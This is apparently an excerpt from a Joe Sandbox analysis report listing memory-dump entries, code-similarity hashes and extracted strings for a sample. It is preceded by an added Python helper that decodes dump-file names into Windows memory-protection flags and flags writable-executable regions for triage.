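Every entry above cites the same Memory Dump Source, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, and the report only states its offset and that it is based on a PE. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it decodes that dotted name into the Windows memory flags it carries so an analyst can see at a glance what kind of region the dump came from. The field layout (process index, snapshot index, dump id, base, protect, state, type, reserved) is an assumption about the report's naming convention and is marked as such in the code; the numeric values of the PAGE_* and MEM_* constants are the winnt.h values and are not assumed. The second sample name in the test is constructed.

```python
"""Decode a Joe Sandbox memory-dump source name into Windows memory flags.

Added example; not part of the Joe Sandbox report.  ASSUMPTION (not stated on
this page): the dotted name is laid out as
    <proc idx>.<snapshot idx>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
The PAGE_* and MEM_* values below are the winnt.h constants and are not assumed.
"""
from dataclasses import dataclass
from typing import List

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass(frozen=True)
class DumpSource:
    process_index: int
    snapshot_index: int
    dump_id: str          # kept opaque; its encoding is not documented here
    base: int
    protect: int
    state: int
    mem_type: int

    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:X}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:X}")

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    def is_writable(self) -> bool:
        return bool(self.protect & 0xCC)   # RW, WRITECOPY, EXECUTE_RW, EXECUTE_WRITECOPY


def parse_dump_source(name: str) -> DumpSource:
    """Split the dotted .sdmp name under the layout assumed above."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"expected 8 dotted fields, got {len(parts)}: {name!r}")
    return DumpSource(
        process_index=int(parts[0], 16),
        snapshot_index=int(parts[1], 16),
        dump_id=parts[2],
        base=int(parts[3], 16),
        protect=int(parts[4], 16),
        state=int(parts[5], 16),
        mem_type=int(parts[6], 16),
    )


def triage(src: DumpSource, based_on_pe: bool) -> List[str]:
    """Flag combinations worth a second look.

    A PE header in committed memory that is not MEM_IMAGE was not placed there
    by the image loader; combined with a writable+executable protection it is
    the usual shape of a region that was written to and then executed.
    """
    findings = []
    if src.is_executable() and src.is_writable():
        findings.append("rwx")
    if based_on_pe and src.state == 0x1000 and src.mem_type != 0x1000000:
        findings.append("pe-outside-image-mapping")
    return findings


if __name__ == "__main__":
    # The name cited by the report entries above; "based on PE: true" is also from the report.
    name = "00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp"
    src = parse_dump_source(name)
    print(f"base=0x{src.base:X} {src.protect_name()} {src.state_name()} {src.type_name()}")
    print("findings:", triage(src, based_on_pe=True))
```

Run stand-alone it prints the decoded flags for the report's own dump name (PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE at 0x15B0000) and the two triage findings; feed it any other .sdmp name from a Joe Sandbox report to compare regions, keeping in mind that the field order is the assumption stated in the docstring.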
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 6aec899807205976fea51f60ccfedd1828bd37497e27a9210f0ec36173eabcd9
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 3981BD30E05A7A8EEF258E6CCC917FEBBA2EF45320F1C421AD861A7391C77488418F55
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                                      • Instruction ID: 850ce548ab0379ae3486a62ae79bae9996006ada4e481c24a08448b7e6fb431b
                                                      • Opcode Fuzzy Hash: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                                      • Instruction Fuzzy Hash: FE2153BAE00119ABDB10DE69DC50AEEBBEDAF54651F05011EEA05D3200E730DA158BA1
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016502BD
                                                      • RTL: Re-Waiting, xrefs: 0165031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016502E7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                                      • Instruction ID: 4650b342b90fc9f3aacd1e0c130ed75f4cc4985fb85caed5c1b9ccc36abb426b
                                                      • Opcode Fuzzy Hash: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                                      • Instruction Fuzzy Hash: 08E19C306047429FD76ACF28CC84B2ABBE1BB88314F144A9DF9A58B3E1D775D945CB42
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01657B7F
                                                      • RTL: Re-Waiting, xrefs: 01657BAC
                                                      • RTL: Resource at %p, xrefs: 01657B8E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                                      • Instruction ID: 7d6c840e51d8b1b6926f98332e70207985f275ec8f1220a79196ef67a02a4425
                                                      • Opcode Fuzzy Hash: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                                      • Instruction Fuzzy Hash: 1841CF317007029FD720DE2ADC40B6AB7E6EF98720F140A1DF95ADB780DB31E8058B95
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 016572C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01657294
                                                      • RTL: Resource at %p, xrefs: 016572A3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                                      • Instruction ID: 1a21b25a07baa3c6cb606bfd1d2d8652103922e8079f50893788b179201aa69e
                                                      • Opcode Fuzzy Hash: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                                      • Instruction Fuzzy Hash: C341F031640206ABC720CE6ACC41B6AB7B6FB94750F14861DFD55EB340DB21E8028BD5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                                      • Instruction ID: 8c20d781298a55702d6189d7e6398e8628a9ea8c5d713b480d964306167c17a9
                                                      • Opcode Fuzzy Hash: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                                      • Instruction Fuzzy Hash: 82317172A00619AFDF20DE2DDC50BEEB7BCAB54610F44055EE949E3240EB30AA548BA0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                                      • Instruction ID: bd021465cd7f573d9d5995b0b9acdb933ad9e14a4d88cb204c6f846ce5c35c79
                                                      • Opcode Fuzzy Hash: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                                      • Instruction Fuzzy Hash: C0811BB1D002699BDB35CB54CC54BEEBBB4BB48754F1041DAEA19B7280D7309E84CFA4
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0166CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                                      • Instruction ID: d2412a02ca1abe63d3aeaf2b7f3fda4ba33a1310ef701a7c667a90e58fc584a5
                                                      • Opcode Fuzzy Hash: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                                      • Instruction Fuzzy Hash: EB418EB1E0061ADFDB219FA9CD40AAABBB8FF94700F00402EEA45DB354D774D801CB65
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56ee9da4001f2d8a14724624146b8c1baf76ee4758a1d2918ede407ceaa83b39
                                                      • Instruction ID: 17bf3a015e178ec4c70bbf2bd028860627e5c4a93ee41fdb2f71f5a1972ba938
                                                      • Opcode Fuzzy Hash: 56ee9da4001f2d8a14724624146b8c1baf76ee4758a1d2918ede407ceaa83b39
                                                      • Instruction Fuzzy Hash: E9318351A593F14ED30E836D08B9675AEC28F5724174EC2EEDADB5F2F3C4888408D3A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: J$ p$%'$($*$$*]$,G$,X$4T$:k$<$=$A$I4$In$J$JB$Ma$OC$Q}$Rr$Tl$U$VP$\$_:$_O$d$eL$f$m$n$pH$pw$rp$s$z`$~$9$f
                                                      • API String ID: 0-2424688085
                                                      • Opcode ID: 4e31a98f1a82f70163da6e1ec742c538cee5bf38066226d6d15133b3a308b9ea
                                                      • Instruction ID: f95a6d52dc979042ed6990497efd3148a345e8bcdefb641387157b39e7df82ac
                                                      • Opcode Fuzzy Hash: 4e31a98f1a82f70163da6e1ec742c538cee5bf38066226d6d15133b3a308b9ea
                                                      • Instruction Fuzzy Hash: 884282B0D0522DCBEB24CF04C9A9BDDBBB1BF44748F1081DAC6496B281C7B95A89CF55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: ff54e980c2e53478a6fe11155c7310cf2a1007bd1f627d9341132c03e7bd1afd
                                                      • Instruction ID: da72ad0ee606bc71861610bf4e692f761aa098ea6bc3fbcf65d23f9a91b9e38d
                                                      • Opcode Fuzzy Hash: ff54e980c2e53478a6fe11155c7310cf2a1007bd1f627d9341132c03e7bd1afd
                                                      • Instruction Fuzzy Hash: 8951A0B2D00119AADB11EF95DE49FEEB378EF44754F0041A9EA0C96140E7B05A098FE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #x
                                                      • API String ID: 0-2712575120
                                                      • Opcode ID: 9194081d5ea9ab4a633400af44f94f31eed37167225e2e88b76e793cfad6b0f6
                                                      • Instruction ID: 74235def4d4ac624d4d68c722d14fa87ba3086a4deadffb5e4a623eb4839de74
                                                      • Opcode Fuzzy Hash: 9194081d5ea9ab4a633400af44f94f31eed37167225e2e88b76e793cfad6b0f6
                                                      • Instruction Fuzzy Hash: F3111FB6D0121DAF8B00DFE9D9419EEB7F9EF48310F14816AE919E7200E7749A058FE0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee2f0ec23db033cd2a23a213daa9be26b4105500770ef431b1a14de7b887055b
                                                      • Instruction ID: 4f1a099921df873c5478b64402aa1b33224d20bfa323c94f824fe2c28662f6ae
                                                      • Opcode Fuzzy Hash: ee2f0ec23db033cd2a23a213daa9be26b4105500770ef431b1a14de7b887055b
                                                      • Instruction Fuzzy Hash: 85411AB1D11229AFDB14CF99DC81AEEBBB8EF49750F10415AFA18E6240D3B19641CFA4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8c02337dbf83409c0976400c58e3364b543278d1427a32fc502a8c4031afd2
                                                      • Instruction ID: efa8a36234af501daff65bd89b87335be2ffa52039b39f04a0bd5ad2398d795a
                                                      • Opcode Fuzzy Hash: 9c8c02337dbf83409c0976400c58e3364b543278d1427a32fc502a8c4031afd2
                                                      • Instruction Fuzzy Hash: 213126B5A00609ABDB14DF99CD41EEFB7B9EF88310F108209FA19A7340D770A911CBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e0d9b603bca894b1b7f488711c6025884fc6d296e1a85b873df96e97ced468d
                                                      • Instruction ID: b71915a94f092577dd8d7bd6959f070641cd0cab21ed9f519573b575030c89bf
                                                      • Opcode Fuzzy Hash: 7e0d9b603bca894b1b7f488711c6025884fc6d296e1a85b873df96e97ced468d
                                                      • Instruction Fuzzy Hash: 7D2139B5A40309AFDB14DF99DD41EAF77A9EF88710F10450EFA19AB340D770A911CBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 122a28cb956b161f71204b9ae56e6163ebd02fcf42b2a4769180d5f5d1eb56d4
                                                      • Instruction ID: b8d30dc230f900325d9df91bd1be8f35ba55658d669c3ca58fd672d0b3d0030d
                                                      • Opcode Fuzzy Hash: 122a28cb956b161f71204b9ae56e6163ebd02fcf42b2a4769180d5f5d1eb56d4
                                                      • Instruction Fuzzy Hash: EA1133B23802057AF7209A599C83FAB775D9B84FA4F244019FF04AB2C1D6A5B9124AB5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c303ae2e17e6a53e5bdcc3aa8a62c71bd7d2a006122dbbbc3965ba7031c3103
                                                      • Instruction ID: f621feaa9daaf9b0c204e60c0091879afad28067d4d1e3ee04ecb5e7b8f87a57
                                                      • Opcode Fuzzy Hash: 4c303ae2e17e6a53e5bdcc3aa8a62c71bd7d2a006122dbbbc3965ba7031c3103
                                                      • Instruction Fuzzy Hash: 6D118EB1641309ABEB10EB98DD41FBF73ACEB84700F10450EFA096B240D7706901CBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 475d2a380ede587fe2260259cfe897adcf26ff11c042f9c526b4772dbf01bc03
                                                      • Instruction ID: fba202b8c88a2be11d301c3decbba980f8b772696479cd06070238577ffc42b0
                                                      • Opcode Fuzzy Hash: 475d2a380ede587fe2260259cfe897adcf26ff11c042f9c526b4772dbf01bc03
                                                      • Instruction Fuzzy Hash: 58212EB6E0121CAFCB00DFA9D9409EFB7F9EF48250F10416AE909E7210E7719A058FE0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e142642b34da3e33b69e24f4b007a474b9c8fc57e88ac5f4ded07d4518e54e4f
                                                      • Instruction ID: 230284de14fe5dcd0d718d2e5f067cdec97ba818f42d1a435c1591523bdd0340
                                                      • Opcode Fuzzy Hash: e142642b34da3e33b69e24f4b007a474b9c8fc57e88ac5f4ded07d4518e54e4f
                                                      • Instruction Fuzzy Hash: F911BEB1A04705ABD710DB58CC41FAF77A8DF89710F10450EFA18AB280D7706A00CBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cde452634cc1f3fcb7d66f20f2e8984e11043ae3e311886356061152b2d6ed4e
                                                      • Instruction ID: b35cdefcec512a6e0ca49e9d3fa606a149845da66e1ab91ee1a3b7de637f0ce5
                                                      • Opcode Fuzzy Hash: cde452634cc1f3fcb7d66f20f2e8984e11043ae3e311886356061152b2d6ed4e
                                                      • Instruction Fuzzy Hash: 4C0184B2204509BBDB44DE99DC90EDB77ADEF8C754F108109BA1D93241D630F851CBA4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ee212dd70e847e9d57dd9ebfbaccc7452ba5116053a47720f42bf5345165b17
                                                      • Instruction ID: eb773df8ad7d16b590622800a0b95ca6b67d79a7b4daf2222adca6f574aab6e6
                                                      • Opcode Fuzzy Hash: 2ee212dd70e847e9d57dd9ebfbaccc7452ba5116053a47720f42bf5345165b17
                                                      • Instruction Fuzzy Hash: 0101D7F2D11219AFCB44DFE8D9419EEBBF9AB08740F14466AE919F3200E7705A048FA5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e6d6aeaa075ab5faecf543c9c0e1a003aaa011f3e8a895a459c754fd1bfb1db
                                                      • Instruction ID: 1515fe19fcc5eb8f3f628893f972b9d7a3304ed403b7b315344375a95e478261
                                                      • Opcode Fuzzy Hash: 0e6d6aeaa075ab5faecf543c9c0e1a003aaa011f3e8a895a459c754fd1bfb1db
                                                      • Instruction Fuzzy Hash: C7F0BBB3A0011666D7105BBDAC90BDABB9CEF89374F244222FA58DB141D672D81586A0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3add9b19641e9a3ca561258509d5c1a4da3ddf55c6f23014d9bc39e2b78fc16a
                                                      • Instruction ID: 38bedab67b543b3cd2129606762be46ecbc35c252a0677ddeaa864389296c36c
                                                      • Opcode Fuzzy Hash: 3add9b19641e9a3ca561258509d5c1a4da3ddf55c6f23014d9bc39e2b78fc16a
                                                      • Instruction Fuzzy Hash: 21F0C271C00119AAEB20BBA4DE04EFE7379DF84350F00428DFA0DA7181E67059468EA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 611c5d89fc7785f83afa4b1f2f52b1aca820fe2185c0b476b9aef72d0bf5d701
                                                      • Instruction ID: 8184d73be82a4e035fa338c191195d940807eb1373f224933ece0e71914227b8
                                                      • Opcode Fuzzy Hash: 611c5d89fc7785f83afa4b1f2f52b1aca820fe2185c0b476b9aef72d0bf5d701
                                                      • Instruction Fuzzy Hash: E7F01CB6210206BFD710EE99DC81EAB77ADEF88750F104419FA1C97241D670B9518BF0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction ID: b7228a66d9ef14f41568b45a40abe58bde1930e4e3609f823a0dc5081a53b2ef
                                                      • Opcode Fuzzy Hash: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction Fuzzy Hash: 5DE06DB12002047BD610EE59DC41E9B33ADEFC8750F004409FA0DA7241D7B0BD108AB4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction ID: 67759d80c33d17377b154cd30018d85168339009e88d51237827203828279be6
                                                      • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction Fuzzy Hash: ACF08271D0520DEBDB14CFA8D841BDDBBB4EF04360F20836EE9259B280D63597508B81
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
